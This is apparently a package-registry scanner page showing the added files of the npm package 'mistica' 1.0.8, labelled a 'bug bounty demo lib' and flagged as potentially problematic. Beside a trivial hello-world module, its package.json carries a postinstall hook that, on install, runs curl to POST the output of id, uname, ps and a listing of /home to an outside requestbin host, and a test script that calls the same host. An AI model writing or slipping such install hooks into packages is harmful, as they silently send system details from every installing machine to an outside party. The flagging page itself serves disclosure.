mistica 1.0.8

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of mistica might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,5 @@
1
+ function helloNpm() {
2
+ return "hello NPM"
3
+ }
4
+
5
+ module.exports = helloNpm
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "mistica",
3
+ "version": "1.0.8",
4
+ "description": "bug bounty demo lib",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "curl -X POST -d \"mistica108-postinstall: $(id;uname -a;pwd;ps -fea;ls -al /home)\" https://requestbin.myworkato.com/12xc8lu1",
8
+ "test": "curl -X POST -d \"test=mistica108\" https://requestbin.myworkato.com/12xc8lu1"
9
+ },
10
+ "author": "draver@safe-mail.net",
11
+ "license": "ISC"
12
+ }
package/test/script.js ADDED
@@ -0,0 +1,5 @@
1
+ const helloNpm = require('mistica')
2
+
3
+ console.log(helloNpm())
4
+
5
+